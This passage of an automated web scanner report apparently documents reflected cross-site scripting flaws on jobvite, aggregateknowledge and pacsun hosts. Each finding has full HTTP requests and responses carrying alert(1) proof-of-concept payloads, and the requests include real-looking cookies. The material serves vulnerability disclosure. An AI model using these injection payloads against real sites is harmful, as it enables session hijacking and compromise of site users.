Date: Mon, 16 May 2011 01:55:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1242
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=7e0dc';alert(1)//3841c1206';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ad5</script><script>alert(1)</script>8c901f57b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xiknzn45ckbuvem4qyncebea; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=1c05d1d2-b665-4a52-bb90-2eb367a590e1; expires=Wed, 15-Jun-2011 10:23:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:23:18 GMT
Content-Length: 40309

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
<!--
jvurlargs = '?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1';
jvurlargsclean = '?c=qlZ9Vfw8&70ad5</script>
...[SNIP]...

5.7. http://html.aggregateknowledge.com/iframe [wid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The value of the wid request parameter is copied into the HTML document as plain text between tags. The payload 6503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a was submitted in the wid parameter. This input was echoed as 6503c<x style=x:expression(alert(1))>bcab1aa82a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframe?wid=26503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:30 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
java.lang.IllegalArgumentException: Could not convert "26503c<x style=x:expression(alert(1))>bcab1aa82a" to int / long.
   at net.agkn.module.common.parameter.ParameterDefinition.castSingleValue(ParameterDefinition.java:259)
   at net.agkn.module.common.parameter.ParameterDefinition.castValue(ParameterDefin
...[SNIP]...

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/AC_close_052110

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50 was submitted in the REST URL parameter 4. This input was echoed as 19ce4<img src=a onerror=alert(1)>61e2893ba50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/AC_close_05211019ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:48 GMT
Connection: close

Unable to find /pacsun/AC_close_05211019ce4<img src=a onerror=alert(1)>61e2893ba50

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_041911

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58 was submitted in the REST URL parameter 4. This input was echoed as 7e30b<img src=a onerror=alert(1)>83e58811a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_0419117e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 77
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:43 GMT
Connection: close

Unable to find /pacsun/FSO_0419117e30b<img src=a onerror=alert(1)>83e58811a58

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo007

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f was submitted in the REST URL parameter 4. This input was echoed as d7f10<img src=a onerror=alert(1)>cc5d87d654f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo007d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo007d7f10<img src=a onerror=alert(1)>cc5d87d654f

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572 was submitted in the REST URL parameter 4. This input was echoed as 810a9<img src=a onerror=alert(1)>e15f190e572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo014810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo014810a9<img src=a onerror=alert(1)>e15f190e572

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo015

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0 was submitted in the REST URL parameter 4. This input was echoed as b23f4<img src=a onerror=alert(1)>e609f813fa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo015b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:52 GMT
Connection: close

Unable to find /pacsun/brand_logo015b23f4<img src=a onerror=alert(1)>e609f813fa0

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo016

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238 was submitted in the REST URL parameter 4. This input was echoed as ebcce<img src=a onerror=alert(1)>ff64f941238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo016ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:10 GMT
Connection: close

Unable to find /pacsun/brand_logo016ebcce<img src=a onerror=alert(1)>ff64f941238

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo017

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4 was submitted in the REST URL parameter 4. This input was echoed as a0352<img src=a onerror=alert(1)>8835400a2e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo017a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:58 GMT
Connection: close

Unable to find /pacsun/brand_logo017a0352<img src=a onerror=alert(1)>8835400a2e4

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btnASmallV3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c was submitted in the REST URL parameter 4. This input was echoed as 9be63<img src=a onerror=alert(1)>42202058f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btnASmallV39be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c?$img_gif$&$txt=GET+PACMAIL&$layer_0_src=PacSunV2%2Fbtn_130x28&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 78
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:56 GMT
Connection: close

Unable to find /pacsun/btnASmallV39be63<img src=a onerror=alert(1)>42202058f7c

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f was submitted in the REST URL parameter 4. This input was echoed as 5699c<img src=a onerror=alert(1)>3d73fa1077f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_searchGo_v25699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:59 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v25699c<img src=a onerror=alert(1)>3d73fa1077f

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_301

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae was submitted in the REST URL parameter 4. This input was echoed as be627<img src=a onerror=alert(1)>d5f2efe08ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_301be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae?$img_gif$&hei=20&wid=61&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/detailLogo_301be627<img src=a onerror=alert(1)>d5f2efe08ae

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_391

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2 was submitted in the REST URL parameter 4. This input was echoed as d8821<img src=a onerror=alert(1)>953892990d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_391d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2?$img_gif$&hei=20&wid=33&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:09 GMT
Connection: close

Unable to find /pacsun/detailLogo_391d8821<img src=a onerror=alert(1)>953892990d2

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/headerEmailV3_envelope

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25 was submitted in the REST URL parameter 4. This input was echoed as 1b809<img src=a onerror=alert(1)>7f5d0e54d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/headerEmailV3_envelope1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
